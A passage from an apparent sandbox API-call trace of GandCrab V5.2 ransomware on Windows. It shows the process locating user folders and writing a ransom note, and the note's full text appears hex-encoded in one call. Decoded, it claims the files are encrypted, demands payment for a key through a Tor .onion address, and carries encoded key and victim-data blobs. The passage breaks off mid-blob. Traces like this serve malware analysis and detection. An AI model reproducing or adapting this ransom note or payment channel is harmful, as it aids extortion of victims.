Files (x86)") returned 1 [0071.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.791] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0071.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.791] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0071.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.791] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0071.791] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.792] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.792] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\\\TITWMVJL-DECRYPT.txt") returned 81 [0071.792] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\credentials\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0071.792] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x4